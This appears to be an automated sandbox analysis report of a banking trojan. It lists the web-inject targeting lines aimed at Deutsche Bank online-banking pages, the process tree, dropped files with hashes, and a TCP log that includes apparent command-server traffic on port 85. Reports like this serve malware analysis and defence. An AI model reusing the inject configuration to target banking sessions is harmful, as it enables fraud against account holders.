set_url meine.deutsche-bank.de/trxm/db/select.type.of.overseas.remittance* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/show.account.turnovers* GP equals www.deutsche-bank.de (Deutsche Bank AG)	iexplore.exe
set_url meine.deutsche-bank.de/trxm/db/show.account.turnovers* equals www.deutsche-bank.de (Deutsche Bank AG)	svchost.exe, wmiprvse.exe, msdtc.exe, iexplore.exe

Analysis Overview

Startup

system is xp

7db482f5469dfeb0a6b2b4f66c062314.exe (PID: 1780 MD5: 7DB482F5469DFEB0A6B2B4F66C062314)

explorer.exe (PID: 1552 MD5: 12896823FB95BFB3DC9B46BCAEDC9923)

skhfushjflw.exe (PID: 784 MD5: 7DB482F5469DFEB0A6B2B4F66C062314)

winlogon.exe (PID: 576 MD5: ED0EF0A136DEC83DF69F04118870003E)

lsass.exe (PID: 676 MD5: BF2466B3E18E970D8A976FB95FC1CA85)

svchost.exe (PID: 836 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

iexplore.exe (PID: 2472 MD5: B60DDDD2D63CE41CB8C487FCFBB6419E)

iexplore.exe (PID: 2948 MD5: B60DDDD2D63CE41CB8C487FCFBB6419E)

svchost.exe (PID: 912 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

svchost.exe (PID: 996 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

svchost.exe (PID: 1052 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

svchost.exe (PID: 1092 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

spoolsv.exe (PID: 1412 MD5: 60784F891563FB1B767F70117FC2428F)

ctfmon.exe (PID: 1728 MD5: 5F1D5F88303D4A4DBC8E5F97BA967CC3)

svchost.exe (PID: 340 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

jqs.exe (PID: 400 MD5: 5E06A9D23727DAF96FAA796F1135FDCD)

MDM.EXE (PID: 420 MD5: 11F714F85530A2BD134074DC30E99FCA)

alg.exe (PID: 1840 MD5: 8C515081584A38AA007909CD02020B3D)

wscntfy.exe (PID: 1924 MD5: F92E1076C42FCD6DB3D72D8CFE9816D5)

svchost.exe (PID: 288 MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18)

wmiprvse.exe (PID: 172 MD5: 798A9E6828997EEF4517ADA8A2259831)

dllhost.exe (PID: 1164 MD5: 0A9BA6AF531AFE7FA5E4FB973852D863)

msdtc.exe (PID: 376 MD5: A137F1470499A205ABBB9AAFB3B6F2B1)

msiexec.exe (PID: 1452 MD5: 5879D691E842574A20FE63817CB76DF9)

cleanup

Dropped Files
File Path	MD5
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DF39BF.tmp	8F0A41CCF29AFC63271A8F650FDA35C3
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~DF47A8.tmp	0821F61047832608BB7D721CA997D3B6
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4	DFDF3FCC73C3D79D960A4BF0142E270B
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\60E31627FDA0A46932B0E5948949F2A5	F7129BD2F205ED6146BB1342D12C903F
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4	12FC6BECC63F9715F4EA11CEF30149AF
C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5	50A61D7D4BAB10BEF9EFAA4313DE89B0
C:\Documents and Settings\Administrator\Cookies\administrator@google[1].txt	863EDFBB3A6F6DC7363571FA810FE2B3
C:\Documents and Settings\Administrator\Cookies\administrator@google[2].txt	041B1094192A7B63444E8FDFEF5BC463
C:\Documents and Settings\Administrator\Cookies\administrator@google[3].txt	3285B4277E3735362BB3FAA34431ABDB
C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\DOMStore\U3Y7OHYG\www.google[1].xml	D148E8E3EB418FAD47993D3C0DF59C4D
C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\RecoveryStore.{0BC6299F-4667-11E1-97AA-08002763FBB4}.dat	6A8E78175FF458E957DF809DD9951804
C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\Recovery\Active\{0BC629A0-4667-11E1-97AA-08002763FBB4}.dat	DF9AFC35126E2009AB3B116B10C692EB
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3FZRZ9KZ\chrome-48[1].png	3FE84B8B53D7401B32FABD0C70F211BB
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3FZRZ9KZ\mgyhp_sm[1].png	6EFE849BCCA95A1036A846F618FDE913
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3FZRZ9KZ\swxa[1].gif	72630BE6F3743631E1FC2C53F8F25344
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\3FZRZ9KZ\tia[1].png	AD07EE4CB98DA073DDA56CE7CEB88F5A
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\google_fr[1].txt	A92794097B1192A3B177BA62418B2F05
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\rs=AItRSTPlPDh3JqT4hZcG--RlbldBDxGPAA[1]	6C9F39E8946018FB1631E818F9668EAE
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\5B7NHQO2\sem_feed2a2e2d54cd5f40fb4b5f5244fff2[1].js	FEED2A2E2D54CD5F40FB4B5F5244FFF2
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\L1ZDGPDD\b0659096785d29d3[1].js	0FA09E7314A4BAC8093E64309A152A19
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\L1ZDGPDD\j_e6a6aca6[1].png	E6A6ACA6F0BF41491306FB48C5CBC2EF
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\L1ZDGPDD\logo3w[1].png	169E859DB7F28A01E1B51E1C9E2D6B2B
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LLFPAG1G\favicon[1].ico	09B565A51E14B721A323F0BA44B2982A
C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\LLFPAG1G\nav_logo107[1].png	92D80817414D8985DE1DCC4425754D66
C:\WINDOWS\Prefetch\7DB482F5469DFEB0A6B2B4F66C062-2ABA240A.pf	F43502801BD279990BA3D5265F42CB1C
C:\WINDOWS\Prefetch\IEXPLORE.EXE-27122324.pf	C1B91BC0C5B15E28B11B3FDFAE443908
C:\WINDOWS\system32\wbem\Logs\wmiprov.log	61C835EF8EC2E9A5E7F4BB57F2412B2E
C:\skhfushjflw\config.bin	B95E4F3E52958AA860B6BA5D44E8650A
C:\skhfushjflw\skhfushjflw.exe	7DB482F5469DFEB0A6B2B4F66C062314
\ROUTER	B605561334335B73E3E90D0E3139C59E
\globpluginspipe	3456A0595C18EFB403FBA33DBADFEB70
\lsass	2B194305EBB60F22791CC48709E9F414

Global Network Data

All TCP
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2012 20:06:12.638062954 CEST	1039	85	192.168.0.10	194.247.58.63
Jul 2, 2012 20:06:12.638093948 CEST	85	1039	194.247.58.63	192.168.0.10
Jul 2, 2012 20:06:12.638293982 CEST	1039	85	192.168.0.10	194.247.58.63
Jul 2, 2012 20:06:12.762447119 CEST	1039	85	192.168.0.10	194.247.58.63
Jul 2, 2012 20:06:12.762470961 CEST	85	1039	194.247.58.63	192.168.0.10
Jul 2, 2012 20:06:12.769419909 CEST	1039	85	192.168.0.10	194.247.58.63
Jul 2, 2012 20:06:12.769490004 CEST	85	1039	194.247.58.63	192.168.0.10
Jul 2, 2012 20:06:12.769702911 CEST	1039	85	192.168.0.10	194.247.58.63
Jul 2, 2012 20:06:22.557746887 CEST	1040	80	192.168.0.10	23.23.227.68
Jul 2, 2012 20:06:22.557774067 CEST	80	1040	23.23.227.68	192.168.0.10
Jul 2, 2012 20:06:22.558010101 CEST	1040	80	192.168.0.10	23.23.227.68
Jul 2, 2012 20:06:22.630816936 CEST	1040	80	192.168.0.10	23.23.227.68
Jul 2, 2012 20:06:22.630852938 CEST	80	1040	23.23.227.68	192.168.0.10
Jul 2, 2012 20:06:23.338170052 CEST	80	1040	23.23.227.68	192.168.0.10
Jul 2, 2012 20:06:23.539930105 CEST	1040	80	192.168.0.10	23.23.227.68
Jul 2, 2012 20:06:33.354585886 CEST	80	1040	23.23.227.68	192.168.0.10
Jul 2, 2012 20:06:33.355050087 CEST	1040	80	192.168.0.10	23.23.227.68
Jul 2, 2012 20:06:45.449976921 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:06:45.450005054 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:06:45.450228930 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:06:45.452275038 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:06:45.452294111 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:06:45.937494040 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:06:46.052731991 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:06:46.053299904 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:06:46.053344011 CEST	80	1043	173.194.69.106	192.168.0.10
Jul 2, 2012 20:06:46.081779957 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:46.081793070 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:46.081991911 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:46.173389912 CEST	1043	80	192.168.0.10	173.194.69.106
Jul 2, 2012 20:06:49.126018047 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.126058102 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.126343966 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.147241116 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.147264004 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.581904888 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.650196075 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.650619030 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.657922029 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.657944918 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.658287048 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.672760963 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.672768116 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.673168898 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.695521116 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.707636118 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.708035946 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.708054066 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.762799025 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.763250113 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.763278961 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.763360977 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.785636902 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.786256075 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.786269903 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.812666893 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.813082933 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.813102007 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.816278934 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.817924023 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.817938089 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.852718115 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.855362892 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.855380058 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.883846045 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.884200096 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.884216070 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.925036907 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.925343037 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.925360918 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.960942984 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:49.961294889 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:49.961313009 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:50.110955954 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:50.110976934 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:50.329006910 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:50.496540070 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:51.612915993 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:51.612946033 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:51.645613909 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:51.645642042 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:51.645971060 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:51.665994883 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:51.666014910 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:51.936590910 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.028717995 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.029097080 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.029119015 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.192051888 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.330037117 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.392671108 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.392699003 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.517275095 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.517293930 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.681835890 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.735291004 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.760291100 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.760543108 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.760561943 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.760888100 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.779480934 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.783039093 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.783324957 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:52.783339977 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:06:52.957523108 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:06:57.999017000 CEST	1046	80	192.168.0.10	199.7.71.190
Jul 2, 2012 20:06:57.999058008 CEST	80	1046	199.7.71.190	192.168.0.10
Jul 2, 2012 20:06:57.999216080 CEST	1046	80	192.168.0.10	199.7.71.190
Jul 2, 2012 20:06:58.000196934 CEST	1046	80	192.168.0.10	199.7.71.190
Jul 2, 2012 20:06:58.000216961 CEST	80	1046	199.7.71.190	192.168.0.10
Jul 2, 2012 20:06:58.523797989 CEST	80	1046	199.7.71.190	192.168.0.10
Jul 2, 2012 20:06:58.647272110 CEST	1046	80	192.168.0.10	199.7.71.190
Jul 2, 2012 20:06:58.647293091 CEST	80	1046	199.7.71.190	192.168.0.10
Jul 2, 2012 20:06:58.863985062 CEST	1046	80	192.168.0.10	199.7.71.190
Jul 2, 2012 20:07:00.458628893 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:00.458708048 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:00.459012985 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:00.461488962 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:00.461507082 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.242489100 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.295207024 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.295777082 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.295799017 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.317548990 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.317965984 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.317979097 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.318269968 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.411159992 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.436861992 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.437365055 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.456767082 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.457294941 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.475208044 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.492681026 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.493253946 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.505157948 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.505347013 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.505740881 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.505770922 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.506098986 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.527256012 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.548378944 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.548943996 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.548973083 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.549189091 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.549285889 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.549292088 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.549665928 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.618357897 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.641001940 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.641587973 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.641627073 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.642036915 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.645744085 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.646905899 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.647419930 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.647442102 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.647785902 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.667541027 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:01.813838959 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:01.813855886 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:02.032896996 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:02.932931900 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:03.126893044 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:03.126950026 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:03.281857967 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:03.282428980 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:03.374352932 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:03.563718081 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:03.563800097 CEST	80	1047	199.7.52.190	192.168.0.10
Jul 2, 2012 20:07:03.786237001 CEST	1047	80	192.168.0.10	199.7.52.190
Jul 2, 2012 20:07:04.971585989 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:04.971607924 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:04.993516922 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:04.993530989 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.259922981 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:05.259954929 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.260241985 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:05.371222973 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:05.371234894 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:05.371571064 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:05.822736025 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.877068043 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.877346992 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:05.877368927 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.991647959 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:05.992238998 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:05.992297888 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.014369965 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.014914036 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.014986038 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.117400885 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.117984056 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.118043900 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.139420033 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.139996052 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.140054941 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.254847050 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.255422115 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.255491018 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.295082092 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.295664072 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.295736074 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.407624006 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.407686949 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.427809000 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.428349972 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.428416967 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.428423882 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.574726105 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.575288057 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.575351954 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.575668097 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.591449022 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.634236097 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.634784937 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.634876966 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.741183043 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.844754934 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.844827890 CEST	80	1045	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:06.954230070 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:06.954305887 CEST	80	1044	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:07.063602924 CEST	1045	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:07.173316002 CEST	1044	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.157717943 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.157802105 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.158207893 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.160505056 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.160540104 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.267168045 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:08.267255068 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:08.267627954 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:08.269750118 CEST	1049	80	192.168.0.10	173.194.69.120
Jul 2, 2012 20:07:08.269795895 CEST	80	1049	173.194.69.120	192.168.0.10
Jul 2, 2012 20:07:08.792800903 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.838726044 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.839278936 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.839337111 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.865055084 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.865427971 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.865451097 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.940176964 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.940730095 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.940803051 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.946738005 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.947170019 CEST	1048	80	192.168.0.10	173.194.69.94
Jul 2, 2012 20:07:08.947195053 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.968770981 CEST	80	1048	173.194.69.94	192.168.0.10
Jul 2, 2012 20:07:08.969172955 CEST	1048	80	192.168.0.10	173.194.69.94
